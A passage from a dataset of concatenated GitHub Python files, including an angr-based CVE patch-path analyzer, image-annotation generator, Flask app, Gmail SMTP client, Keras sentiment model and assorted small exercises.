slicing\")\r\n blocks_data_depend = iterate_slice(self._bin, self._func_addr, self._slice_target_addrs, self.asm_cfg)\r\n self._re_write_edge_weight(blocks_data_depend)\r\n\r\n def _remove_unreachable_node(self):\r\n l.debug(\"[*] getting all unreacheable_nodes\")\r\n unreacheable_nodes = list(self._get_all_unreacheable_blocks(self._check_node_addr))\r\n to_remove_edges = []\r\n for node in unreacheable_nodes:\r\n for node_child in self.cfg[node]:\r\n to_remove_edges.append((node, node_child))\r\n for node, node_child in to_remove_edges:\r\n self.cfg.remove_edge(node, node_child)\r\n\r\n\r\n def _init_miasm(self):\r\n fdesc = open(self._bin, 'rb')\r\n loc_db = LocationDB()\r\n cont = Container.from_stream(fdesc, loc_db)\r\n machine = Machine(cont.arch)\r\n mdis = machine.dis_engine(cont.bin_stream, loc_db=cont.loc_db)\r\n return mdis\r\n\r\n def _re_write_edge_weight(self, blocks_to_add_weight, weight_increament=1000):\r\n '''\r\n :param self.cfg:\r\n :param blocks_to_add_weight:\r\n :return:\r\n '''\r\n for node_addr in blocks_to_add_weight:\r\n block = self._angr_proj.factory.block(node_addr)\r\n node_in_graph = block.codenode\r\n l.debug('[*] add weigth to edges to node {}'.format(hex(node_addr)))\r\n for pred_node in list(self.cfg.predecessors(node_in_graph)):\r\n self.cfg[pred_node][node_in_graph].update({'weight': weight_increament})\r\n return self.cfg\r\n\r\n def get_pruned_cfg(self):\r\n return self.cfg\r\n\r\n def get_shortest_paths(self):\r\n # return nx.dijkstra_path(self.cfg, source=self._function_entry_node, target=self._check_node)\r\n return nx.all_shortest_paths(self.cfg, source=self._function_entry_node, target=self._check_node, weight='weight')\r\n\r\n def get_simple_paths(self, cutoff=None):\r\n\r\n return nx.all_simple_paths(self.cfg, source=self._function_entry_node, target=self._check_node, cutoff=cutoff)\r\n\r\n def _get_all_unreacheable_blocks(self, check_node_addr):\r\n '''\r\n\r\n '''\r\n cfg = self.cfg\r\n check_node = self._check_node\r\n if check_node not in cfg.nodes:\r\n raise Exception(\"check node in not in cfg.nodes\")\r\n\r\n reacheable_blocks = [] # record the blocks reaching to patch\r\n predecessor_queue = [check_node]\r\n while len(predecessor_queue) > 0:\r\n current_node = predecessor_queue.pop(0)\r\n\r\n for parentnode in cfg.predecessors(current_node):\r\n if parentnode.addr not in reacheable_blocks:\r\n reacheable_blocks.append(parentnode.addr)\r\n predecessor_queue.append(parentnode)\r\n\r\n for node in cfg.nodes:\r\n if node.addr not in reacheable_blocks:\r\n yield node\r\n\r\n def _get_FLAG_instruction(self, node_addr:int):\r\n '''\r\n :param node:\r\n '''\r\n block = self._mdis.dis_block(node_addr)\r\n if block.lines[-1].name == 'CALL':\r\n try:\r\n next_loc_key = block.get_next()\r\n next_block_addr = self._mdis.loc_db.get_location_offset(next_loc_key)\r\n return self._get_FLAG_instruction(next_block_addr)\r\n except KeyError as e:\r\n l.error(\"[-] block {} has no successor\".format(hex(node_addr)))\r\n return node_addr\r\n\r\n for inst in reversed(block.lines):\r\n if inst.name in self._TARGET_INSTRUCTION:\r\n return inst.offset\r\n else:\r\n return node_addr\r\n\r\n\r\ndef itest_cfgps():\r\n '''\r\n Run for CVE-2018-20671,/home/angr/PatchDiff/binaries/binutils/O0/objdump-2.31.1,/home/angr/PatchDiff/binaries/binutils/O0/objdump-2.32,load_specific_debug_section\r\n 0x804f309 0x804f34b\r\n '''\r\n x='CVE-2018-7568,/home/angr/PatchDiff/binaries/binutils/O0/addr2line-2.30,/home/angr/PatchDiff/binaries/binutils/O0/addr2line-2.31,parse_die'\r\n check_addr = 0x80b421f\r\n patch_addr = 0x80b4250\r\n\r\n\r\n s = x.split(',')\r\n binary_path =s[2]\r\n function_name = s[-1]\r\n p = angr.Project(binary_path,\r\n load_options={'auto_load_libs': False})\r\n\r\n func_addr = p.loader.find_symbol(function_name).rebased_addr\r\n\r\n cfgcache = binary_path+\".angr_cfg\"\r\n if os.path.exists(cfgcache):\r\n cfg = pickle.load(open(cfgcache, 'rb'))\r\n else:\r\n cfg = p.analyses.CFGFast()\r\n function_cfg = cfg.functions[function_name].graph\r\n\r\n cfgps = CFG_PS(binary_path, function_cfg, func_addr, check_addr, patch_addr, p)\r\n for path in cfgps.get_shortest_paths():\r\n addrs = [hex(node.addr) for node in path]\r\n print(\"[>] path: {}\".format(\",\".join(addrs)))\r\n\r\n\r\nif __name__ == '__main__':\r\n itest_cfgps()","repo_name":"shouguoyang/Robin","sub_path":"cfg_pruning_with_slice.py","file_name":"cfg_pruning_with_slice.py","file_ext":"py","file_size_in_byte":8289,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"35541341139","text":"from PIL import Image, ImageDraw\nfrom PIL import ImageFilter\nimport glob\nimport os\nfrom PIL import ImageColor\nfrom pathlib import Path\nimport random\n\n# Settings\nbackground_size = (1280, 1280)\n\n# Symbols\nsymbol_paths = glob.glob(os.path.join(\"symbols\", \"*.png\"))\nsymbol_paths.sort()\n\n# Background generation\nbg_colors = [\"red\", \"green\", \"blue\", \"gray\", \"yellow\", \"purple\", \"black\"]\n\nfor lol in range(2000):\n background = Image.new(\"RGBA\", background_size, random.choice(bg_colors))\n\n # Drawing colored ellipses\n bg_draw = ImageDraw.Draw(background)\n for i in range(500):\n x = random.randint(-15, background.width)\n y = random.randint(-15, background.height)\n w = random.randint(100, 250)\n l = random.randint(100, 250)\n c = random.choice(bg_colors)\n bg_draw.ellipse((x, y, x+w, y+l), fill=c, outline=None)\n background = background.filter(ImageFilter.MedianFilter(size=9))\n\n # Label generation\n label_width = random.randint(int(background_size[0]*0.2), int(background_size[1]*0.4))\n label_height = random.randint(int(background_size[0]*0.5), int(background_size[1]*0.6))\n label = Image.new(\"RGBA\", (label_width, label_height), \"white\")\n\n # Compose symbols\n num_symbols = 2\n selected_symbols = random.choices(symbol_paths, k=num_symbols)\n annotations = []\n for i, symbol_path in enumerate(selected_symbols):\n symbol = Image.open(symbol_path)\n symbol = symbol.resize((int(label_width/num_symbols), int(label_width/num_symbols)))\n x = 0 if i == 0 else int(label_width/num_symbols) * i\n y = 10\n label.paste(symbol, (x, y), mask=symbol)\n # Writing annotation\n x_center = x + (symbol.width / 2)\n y_center = y + (symbol.height / 2)\n x_center_normalized = x_center / background.width\n y_center_normalized = y_center / background.height\n width_normalized = symbol.width / background.width\n height_normalized = symbol.height / background.height\n class_number = symbol_paths.index(symbol_path)\n annotation = f\"{class_number} {x_center_normalized} {y_center_normalized} {width_normalized} {height_normalized}\"\n annotations.append(annotation)\n\n\n # Paste label into background\n label_x_pos = random.randint(0, background.width - label.width)\n label_y_pos = random.randint(0, background.height - label.height)\n background.paste(label, (label_x_pos, label_y_pos), mask=label)\n #background.show()\n print(lol)\n\n # Save to disk\n # Creating output folder structure\n images_folder = os.path.join(\"out\", \"images\")\n labels_folder = os.path.join(\"out\", \"labels\")\n Path(images_folder).mkdir(parents=True, exist_ok=True)\n Path(labels_folder).mkdir(parents=True, exist_ok=True)\n background = background.convert(\"RGB\")\n background.save(os.path.join(images_folder, f\"img{lol}.jpg\"))\n annotation_file = open(os.path.join(labels_folder, f\"img{lol}.txt\"), \"w\")\n for annotation in annotations:\n annotation_file.write(annotation + \"\\n\")\n annotation_file.close()\n","repo_name":"JohannesBauer97/2d-data-generator","sub_path":"src/color-bg-generator/gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":3072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8516315365","text":"vowels = ('a', 'e', 'i', 'o', 'u', 'y')\n\nwords = []\n\ncommand = input()\nwhile command != \"End of words\":\n current_word = command\n points = 0\n for char in current_word:\n points += ord(char)\n\n if current_word[0].lower() in vowels:\n points *= len(current_word)\n else:\n points = int(points / len(current_word))\n\n word = {\"word\": current_word, \"points\": points}\n words.append(word)\n\n command = input()\n\n# print(words)\nwords.sort(key=lambda w: -w['points'])\nbest_word = words[0]\n\nprint(f\"The most powerful word is {best_word['word']} - {best_word['points']}\")\n","repo_name":"SimeonChifligarov/SoftUni_as_Lecturer","sub_path":"Python_Courses/Python_Basics/Preparation_PB_Exams/01_PB_Exam_6_7_July_2019/06_The_Most_Powerful_Word.py","file_name":"06_The_Most_Powerful_Word.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"42969835314","text":"from typing import Dict, List, Optional, Union\n\nfrom .player import Player\nfrom games.common.models.play import Play as BasePlay\n\n\nclass Play(BasePlay):\n def __init__(self, row: int, col: int, player: Player):\n self.row = row\n self.col = col\n BasePlay.__init__(self, player=player)\n\n @classmethod\n def from_database(cls, json_data: Dict[str, Union[int, str]], all_players: List[Player]) -> 'Play':\n play_player: Optional[Player] = None\n for player in all_players:\n if player.name == json_data['player_name']:\n play_player = player\n break\n\n assert play_player is not None, f'Could not find player named `{json_data[\"player_name\"]}`'\n\n return Play(row=json_data['row'], col=json_data['col'], player=play_player)\n\n @classmethod\n def from_frontend(cls, json_data: Dict[str, Union[int, str]], all_players: List[Player]) -> 'Play':\n play_player: Optional[Player] = None\n for player in all_players:\n if player.symbol == json_data['symbol']:\n play_player = player\n break\n\n assert play_player is not None, f'Could not find player with symbol `{json_data[\"symbol\"]}`'\n\n return Play(row=json_data['row'], col=json_data['col'], player=play_player)\n\n def to_database(self) -> Dict[str, Union[str, int]]:\n return {\n 'row': self.row,\n 'col': self.col,\n 'player_name': self.player.name\n }\n\n def to_frontend(self) -> Dict[str, Union[str, int]]:\n return {\n 'row': self.row,\n 'col': self.col,\n 'symbol': self.player.symbol\n }\n","repo_name":"PraderioM/GamePlatform","sub_path":"backend/games/tic_tac_toe/models/play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17134513109","text":"import os\n\nfrom flask import Blueprint, Flask\nfrom flask_webpack import Webpack\nfrom filters import filters\nfrom sitemap import sitemap_blueprint\n\nbrigade = Blueprint('brigade', __name__)\n\n\ndef create_app():\n app = Flask(__name__, static_folder='build/public/', static_url_path='/assets')\n app.config['SECRET_KEY'] = 'sekrit!'\n\n app.config['WEBPACK_MANIFEST_PATH'] = os.path.abspath('./brigade/build/manifest.json')\n webpack = Webpack()\n webpack.init_app(app)\n\n if 'SERVER_NAME' in os.environ:\n app.config['SERVER_NAME'] = os.environ['SERVER_NAME']\n if 'SITEMAP_URL_SCHEME' in os.environ:\n app.config['SITEMAP_URL_SCHEME'] = os.environ['SITEMAP_URL_SCHEME']\n\n app.register_blueprint(brigade)\n app.register_blueprint(filters)\n app.register_blueprint(sitemap_blueprint)\n return app\n\n\nfrom . import views # noqa:E402\n","repo_name":"Vhoakab84/brigade","sub_path":"brigade/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"23676630809","text":"#!/usr/bin/bash\n\nimport pygame\n\n# Movement Keys\nUP = pygame.K_w\nDOWN = pygame.K_s\nLEFT = pygame.K_a\nRIGHT = pygame.K_d\n\n# RGB values\nBLACK = (0, 0, 0)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\n\n# Screen Dimensions\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 600\nSCREEN_SIZE = (SCREEN_WIDTH, SCREEN_HEIGHT)\n\n# Set screen\nscreen = pygame.display.set_mode(SCREEN_SIZE)\npygame.display.set_caption('SpacEnemy')\n\n\n# Background\nbackground = pygame.image.load('images/background.jpg')\nbackground_height = background.get_rect().height\n\n# Player\nplayerSprite = pygame.image.load('images/spaceship_normal.png')\nplayer_x = int(SCREEN_WIDTH / 2) - 30\nplayer_y = int(600 / 1.25)\n\n# Start the game\npygame.init()\n\ndef player(x, y):\n screen.blit(background, (0, 0))\n screen.blit(playerSprite, (player_x, player_y))\n\n\n\nrunning = True\nwhile running:\n screen.fill(BLACK)\n #player_y -= 1\n #player_x -= 1\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\n # Player movement\n if event.type == pygame.KEYDOWN:\n if event.key == UP:\n player_y -= 6\n if event.key == DOWN:\n player_y += 6\n if event.key == LEFT:\n player_x -= 6\n if event.key == RIGHT:\n player_x += 6\n\n player(player_x, player_y)\n pygame.display.update()\n\n","repo_name":"emanuel2718/Hitchhiking-the-galaxy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9919384351","text":"#!/usr/bin/env python\n\nimport itertools\nimport numpy as np\n\ndef calc1(data):\n a = np.array([list(line) for line in data.split()])\n coords = np.argwhere(a.T == '#')\n # print('coords', coords)\n\n counts = np.zeros(coords.shape[0], int)\n for i in range(len(coords)):\n cx, cy = coords[i]\n rest = np.delete(coords, i, axis=0)\n rest -= coords[i]\n # print('considering:', cx, cy)\n # print('rebased', rest)\n rest = np.array(sorted(rest, key=lambda p: np.max(np.abs(p))))\n # print('sorted', rest)\n masked = np.zeros(len(rest), bool)\n for j in range(len(rest)-1):\n if masked[j]:\n continue\n # print('masking:', rest[j])\n x, y = rest[j] // np.gcd(*rest[j])\n # eg (4, 2) masks (2, 1), (4, 2), (6, 3)\n # multiples\n ds = rest[j+1:,0] * y == rest[j+1:,1] * x\n # print(ds)\n # same quarter\n q = ((rest[j+1:] * rest[j]) >= 0).all(axis=1)\n # print(q)\n masked[j+1:] = masked[j+1:] | (ds & q)\n # print('result:', masked)\n\n # print('amsked:', masked)\n sees = (~masked).sum()\n counts[i] = sees\n\n return coords, counts\n\ndef test1(data):\n _, counts = calc1(data)\n return tuple(coords[np.argmax(counts)])\n\ndef quarter(q, ratio, vapourized, survivors):\n # group by matching ratio, sorted by first in sweep\n for _, group in itertools.groupby(sorted(q, key=ratio), key=ratio):\n # sort by distance\n order = sorted(group, key=lambda p: abs(p[0])+abs(p[1]))\n vapourized.append(order[0])\n survivors.extend(order[1:])\n\ndef part1(data):\n coords, counts = calc1(data)\n pos = coords[np.argmax(counts)]\n return tuple(pos), max(counts)\n\ndef part2(data, base=None, number=199):\n a = np.array([list(line) for line in data.split()])\n if base:\n a[base[1],base[0]] = 'X'\n coords = np.argwhere(a.T == '#')\n base = np.argwhere(a.T == 'X')\n coords -= base\n vapourized = []\n\n while len(coords):\n q1 = coords[(coords[:,0] >= 0) & (coords[:,1] < 0)]\n q2 = coords[(coords[:,0] > 0) & (coords[:,1] >= 0)]\n q3 = coords[(coords[:,0] <= 0) & (coords[:,1] > 0)]\n q4 = coords[(coords[:,0] < 0) & (coords[:,1] <= 0)]\n\n survivors = []\n quarter(q1, lambda p: abs(p[0]/p[1]), vapourized, survivors)\n quarter(q2, lambda p: abs(p[1]/p[0]), vapourized, survivors)\n quarter(q3, lambda p: abs(p[0]/p[1]), vapourized, survivors)\n quarter(q4, lambda p: abs(p[1]/p[0]), vapourized, survivors)\n\n coords = np.array(survivors)\n\n vapourized = np.array(vapourized) + base\n x, y = vapourized[number]\n return x*100+y\n\nif __name__ == '__main__':\n data = open('input10.txt').read()\n pos, count = part1(data)\n print(count)\n print(part2(data, pos))\n","repo_name":"barnybug/aoc2019","sub_path":"day10.py","file_name":"day10.py","file_ext":"py","file_size_in_byte":2884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70887510887","text":"#1.8\n\n#Hipoteca_adelantos\n#Supongamos que David adelanta pagos extra de $1000/mes durante los primeros 12 meses de la hipoteca.Modificá el programa para incorporar estos pagos extra y que imprima el monto total pagado junto con la cantidad de meses requeridos.Cuando lo corras, este nuevo programa debería dar un pago total de 929965.62 en 342 meses.\n\npago_extra_mes_comienzo = 61\npago_extra_mes_fin = 108\npago_extra = 1000\n\nsaldo = 500000.0\ntasa = 0.05\npago_mensual = 2684.11\ntotal_pagado = 0.0\nmes = 1\n\nwhile saldo > 0:\n if (mes >= pago_extra_mes_comienzo and mes <= pago_extra_mes_fin):\n print(\"Entro al if\")\n saldo = saldo * (1+tasa/12) - pago_mensual - pago_extra\n total_pagado = total_pagado + pago_mensual + pago_extra\n else:\n saldo = saldo * (1+tasa/12) - pago_mensual\n total_pagado = total_pagado + pago_mensual\n \n if (saldo < 0):\n total_pagado = total_pagado + saldo\n saldo = 0\n\n print(mes, round(total_pagado, 2), round(saldo, 2))\n mes = mes + 1\n \nprint('Total pagado', round(total_pagado, 2))\nprint('Meses: ', mes-1)\n\n#Maria Elisa Araya\n","repo_name":"elishitas/python_UNSAM","sub_path":"hipoteca_adelantos.py","file_name":"hipoteca_adelantos.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2791952323","text":"#from sklearn.cross_validation import train_test_split\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split #py3\nfrom sklearn.feature_extraction import stop_words\nimport numpy as np\nfrom nltk.util import ngrams,everygrams\nimport re\nimport string\nimport time\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Flatten, LSTM, Conv1D, MaxPooling1D, Dropout, Activation\nfrom keras.layers.embeddings import Embedding #change\n\ntimestr = time.strftime(\"%Y%m%d-%H%M%S\")\nstop=stop_words.ENGLISH_STOP_WORDS\nRUNS=3\nnum_ex=20000\n\ndef create_conv_model(inplen):\n model_conv = Sequential()\n model_conv.add(Embedding(len(word_set)+1, 100, input_length=inplen))\n model_conv.add(Dropout(0.2))\n model_conv.add(Conv1D(64, 5, activation='relu'))\n model_conv.add(MaxPooling1D(pool_size=4))\n model_conv.add(LSTM(100))\n model_conv.add(Dense(1, activation='sigmoid'))\n model_conv.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\n return model_conv\n\ndef encode_sentences(txt):\n feature_set=np.zeros((len(txt), len(word_set)+1),dtype=int)\n tnum=0\n for t in txt:\n s_words=t[1:]+list(set(list(everygrams(t[1:], min_len=2,max_len=2))))\n for w in s_words:\n idx=word_idx[w]\n feature_set[tnum][idx]=1\n feature_set[tnum][-1]=t[0]\n tnum+=1\n return feature_set\n\ninp='../tweets_positivenegative.csv'\n\nsents=[]\nlabels=[]\nall_words=[] \n\ndf=pd.read_csv(inp,sep='\\t', quoting=2, dtype={'id ':int,'polarity': int })\ndf = df.dropna()\ndata=df.iloc[np.r_[0:num_ex, -num_ex:0]]\n\nfrom nltk.tokenize import TweetTokenizer\ntknzr = TweetTokenizer()\n\nmaxlen=53\nlcnt=0\n\nfor ind, row in data.iterrows():\n\ttw=row['tweet'].lower()\n\twords=tknzr.tokenize(tw)\n\tif len(words)')\n\tbl=list(set(list(everygrams(words, min_len=2,max_len=2))))\n\tall_words+=words+bl\n\twords.insert(0,lcnt)\n\tsents.append(words)\n\tif row['polarity']==4:\n\t\tlabels.append(1)\n\telse:\n\t\tlabels.append(0)\n\tlcnt+=1\n\nword_set=set(all_words)\ni=0\nword_idx = dict((c, i + 1) for i, c in enumerate(word_set,start = -1))\nreverse_word_map = dict(map(reversed, word_idx.items()))\ndata=encode_sentences(sents)\n\nCLASSES=list(set(labels))\nNUM_FEATURES=len(data[0])-1\n\nresult=np.zeros(RUNS)\nclf = create_conv_model(len(word_set)) #change\n\nfor r in range(RUNS):\n print('Run:',r)\n x_train, x_test, y_train, y_test = train_test_split(data, labels)\n x_train_ids=x_train[:,-1]\n x_test_ids=x_test[:,-1]\n x_train=x_train[:,:-1]\n x_test=x_test[:,:-1]\n clf.fit(x_train, np.array(y_train), validation_split=0.1, epochs =1)\n print(clf.predict(x_test))\n","repo_name":"rupsaijna/annotated_pytsetlin_machine","sub_path":"examples/sentiment140/baseline/cnnlstm.py","file_name":"cnnlstm.py","file_ext":"py","file_size_in_byte":2759,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"70564224809","text":"def min_and_max(num1, num2):\n\tif num1 > num2:\n\t\treturn num2, num1\n\telse:\n\t\treturn num1, num2\n\ndef converte_par(numero):\n\t'''Transforma um número par em um número sucessor impar'''\n\treturn numero + ((numero+1)%2)\n\t\n\ndef soma_impares(inicio, fim, soma=0):\t\t\n\t'''Obs: Possível problema de limite de recursões'''\t\n\tif fim%2 == 0:\n\t\t\tfim = converte_par(fim)\t \n\n\tif inicio%2 == 0:\n\t\tinicio = converte_par(inicio)\n\telse:\n\t\tinicio += 2\n\n\tif inicio < fim:\n\t\treturn soma_impares(inicio, fim, soma+inicio)\n\telse:\n\t\treturn soma\t\n\n\ndef main():\n\tnum1 = int(input())\n\tnum2 = int(input())\n\n\tnum1, num2 = min_and_max(num1, num2)\n\n\tprint(soma_impares(num1, num2))\n\n\nmain()\n","repo_name":"douradodev/Uri","sub_path":"Uri/1071_v2.py","file_name":"1071_v2.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31494362572","text":"import pandas as pd\nfrom collections import Counter\nimport requests\nimport json\nimport os\n\ndirname = os.path.dirname(__file__)\n\n\ndef add_database():\n ratings_local = pd.read_csv(\n os.path.join(\n dirname,\n '../../data/data-for-analysis/ratings-smaller-with-new-ids.csv'))\n\n req_ratings = requests.get(\n # 'http://localhost:8080/api/v1/rating/get-all').json()\n 'https://www.backend.themoviebakery.com/api/v1/rating/get-all').json()\n\n json_list = json.dumps(req_ratings, indent=4)\n\n ratings_db = pd.read_json(json_list)\n if len(ratings_db) != 0:\n ratings_db.drop(axis=1,\n labels=['created_at', 'updated_at', 'ratingId'],\n inplace=True)\n ratings_db.rename(columns={'ratingValue': 'rating'}, inplace=True)\n ratings_db['userId'] += 49\n\n ratings_df = pd.concat([ratings_local, ratings_db])\n ratings_df.to_csv(os.path.join(\n dirname,\n '../../data/data-for-analysis/ratings-small-with-database.csv'),\n index=False)\n else:\n ratings_local.to_csv(os.path.join(\n dirname,\n '../../data/data-for-analysis/ratings-small-with-database.csv'),\n index=False)\n\n del req_ratings\n del json_list\n del ratings_db\n\n\nadd_database()\n","repo_name":"diegolikescode/themoviebakery-recommender","sub_path":"src/data_preprocessing/c_add_database_to_ratings.py","file_name":"c_add_database_to_ratings.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72508934887","text":"import pytest\nfrom sqlalchemy.ext.asyncio import AsyncSession\n\nfrom lebonplantapi.adapters.database.mappers import (\n map_from_product_creation,\n map_to_product_entity,\n)\n\nfrom tests.adapters.database.factories import ProductFactory, UserFactory\nfrom tests.domain.request_models.factories import ProductCreationFactory\n\n\npytestmark = [\n pytest.mark.asyncio,\n pytest.mark.usefixtures(\"db\"),\n]\n\n\nclass TestMapToProduct:\n def test__ok(self) -> None:\n product = ProductFactory.build()\n entity = map_to_product_entity(product)\n\n assert entity is not None\n assert entity.id == product.id\n assert entity.name == product.name\n\n\nclass TestMapFromProductCreation:\n async def test__ok(self, session_autoclose: AsyncSession) -> None:\n product_creation = ProductCreationFactory()\n\n product = map_from_product_creation(product_creation)\n\n user = UserFactory.build(id=product.vendor_id)\n session_autoclose.add(user)\n\n session_autoclose.add(product)\n await session_autoclose.flush()\n await session_autoclose.refresh(product)\n\n assert product is not None\n assert product.name == product_creation.name\n","repo_name":"LiquidNalee/LeBonPlantAPI","sub_path":"tests/adapters/database/mappers/test_product.py","file_name":"test_product.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12385880364","text":"#!/usr/bin/env python\n# coding=utf-8\n\n''' `mail' like gmail smtp client, run it with '-h' for usage '''\n\nimport os\nimport sys\nimport smtplib\nimport optparse\nimport unittest\nimport mimetypes\nfrom email import encoders\nfrom email.message import Message\nfrom email.mime.audio import MIMEAudio\nfrom email.mime.base import MIMEBase\nfrom email.mime.image import MIMEImage\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom cStringIO import StringIO\n\n\ndef parse_option(args=None):\n parser = optparse.OptionParser()\n parser.add_option('-s', '--subject', dest='subject',\n help='subject of the mail')\n parser.add_option('-u', '--username', dest='username',\n help='send mail through gmail as')\n parser.add_option('-p', '--password', dest='password',\n help='password to login info gmail account')\n parser.add_option('-x', '--xhtml_body', dest='xhtml_body',\n help='the html body of the message')\n parser.add_option('-a', '--attach', dest='attaches', action='append',\n help='attachment to send')\n parser.add_option('-b', '--bcc', dest='bcc', action='append',\n help='send blind carbon copies to list of users')\n parser.add_option('-c', '--cc', dest='cc', action='append',\n help='send carbon copies to list of users')\n (options, arguments) = parser.parse_args(args)\n return options, arguments\n\n\ndef gmail_sendmail(from_address, password,\n to_addresses, cc_addresses, bcc_addresses,\n subject, text_body='', xhtml_body=None, attachments=None):\n gmail_account = from_address\n if attachments == None:\n attachments = []\n server = smtplib.SMTP('smtp.gmail.com', 587)\n server.ehlo()\n server.starttls()\n server.ehlo()\n server.login(gmail_account, password)\n outer = MIMEMultipart('mixed')\n outer['Subject'] = subject\n outer['To'] = ', '.join(to_addresses)\n if cc_addresses is not None:\n outer['Cc'] = ', '.join(cc_addresses)\n else:\n cc_addresses = []\n if bcc_addresses is None:\n bcc_addresses = []\n outer['From'] = from_address\n\n for att in attachments:\n if sys.platform == 'win32':\n if att[1] != ':':\n # relative path\n path = os.path.join(os.getcwd(), att)\n else:\n path = att\n elif sys.platform.startswith('linux') or \\\n sys.platform in ('darwin', 'cygwin'):\n if att[0] != '/':\n # relative path\n path = os.path.join(os.getcwd(), att)\n else:\n path = att\n else:\n raise ValueError('what os is it?!')\n # Guess the content type based on the file's extension. Encoding\n # will be ignored, although we should check for simple things like\n # gzip'd or compressed files.\n ctype, encoding = mimetypes.guess_type(path)\n if ctype is None or encoding is not None:\n # No guess could be made, or the file is encoded (compressed), so\n # use a generic bag-of-bits type.\n ctype = 'application/octet-stream'\n maintype, subtype = ctype.split('/', 1)\n if maintype == 'text':\n fp = open(path, 'rb')\n # Note: we should handle calculating the charset\n msg = MIMEText(fp.read(), _subtype=subtype)\n fp.close()\n elif maintype == 'image':\n fp = open(path, 'rb')\n msg = MIMEImage(fp.read(), _subtype=subtype)\n fp.close()\n elif maintype == 'audio':\n fp = open(path, 'rb')\n msg = MIMEAudio(fp.read(), _subtype=subtype)\n fp.close()\n else:\n fp = open(path, 'rb')\n msg = MIMEBase(maintype, subtype)\n msg.set_payload(fp.read())\n fp.close()\n # Encode the payload using Base64\n encoders.encode_base64(msg)\n # Set the filename parameter\n msg.add_header('Content-Disposition', 'attachment',\n filename=os.path.basename(path))\n outer.attach(msg)\n\n if xhtml_body is not None:\n html_content = MIMEText(xhtml_body, 'html')\n outer.attach(html_content)\n else:\n text_content = MIMEText(text_body, 'plain')\n outer.attach(text_content)\n\n server.sendmail(gmail_account,\n to_addresses + cc_addresses + bcc_addresses,\n outer.as_string())\n server.close()\n\n\ndef main():\n options, arguments = parse_option()\n text_body = StringIO()\n if options.xhtml_body:\n xhtml_body = StringIO()\n with open(options.xhtml_body) as f:\n xhtml_body.write(f.read())\n else:\n xhtml_body = None\n for line in sys.stdin:\n text_body.write(line)\n gmail_sendmail(from_address=options.username,\n password=options.password,\n to_addresses=arguments,\n cc_addresses=options.cc,\n bcc_addresses=options.bcc,\n subject=options.subject,\n text_body=text_body.getvalue(),\n xhtml_body=(xhtml_body.getvalue() if xhtml_body else None),\n attachments=options.attaches)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"menghan/menghanrc","sub_path":"bin/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":5401,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"11432509387","text":"# -*- coding=utf-8 -*-\n# @File : temp.py\n# @Time : 2023/8/29 10:27\n# @Author : EvanHong\n# @Email : 939778128@qq.com\n# @Project : 2023.06.08超高频上证50指数计算\n# @Description: 将旧的status转为value为list的status\n\nimport os\nimport sys\npath = os.path.join(os.path.dirname(__file__), os.pardir)\nsys.path.append(path)\n\nfrom collections import defaultdict\nimport config\nfrom backtester import LobBackTester\nfrom brokers.broker import Broker\nfrom config import *\nfrom datafeeds.datafeed import LobDataFeed\nfrom observers.observer import LobObserver\nfrom preprocessors.preprocess import AggDataPreprocessor\nfrom strategies import LobStrategy\nfrom support import *\n\nif __name__ == '__main__':\n load_status(is_tick=True)\n\n # orderbooks\n stk_name_list = config.complete_status['orderbooks']\n temp = {}\n for k in stk_name_list:\n if k in ['AAPL', 'AMZN', 'GOOG', 'INTC', 'MSFT']:\n temp[k] = [\"2012-06-21\"]\n else:\n temp[k] = [\"2022-06-23\", \"2022-06-28\", \"2022-06-29\"]\n config.complete_status['orderbooks']=temp\n\n # features\n temp1 = defaultdict(list)\n for r, d, f in os.walk(r'D:\\Work\\INTERNSHIP\\海通场内\\2023.06.08超高频上证50指数计算\\data\\tick_data/'):\n for ff in f:\n if 'clean' not in ff: continue\n (date, stk_name, suffix, _) = ff.split('_')\n date = str(pd.to_datetime(date).date())\n temp1[stk_name].append(date)\n temp1\n\n temp.update(temp1)\n\n stk_name_list = config.complete_status['features']\n temp = {}\n for k in stk_name_list:\n if k in ['AAPL', 'AMZN', 'GOOG', 'INTC', 'MSFT']:\n temp[k] = [\"2012-06-21\"]\n else:\n temp[k] = [\"2022-06-23\", \"2022-06-28\", \"2022-06-29\"]\n temp\n counter = defaultdict(lambda: defaultdict(int))\n for r, d, f in 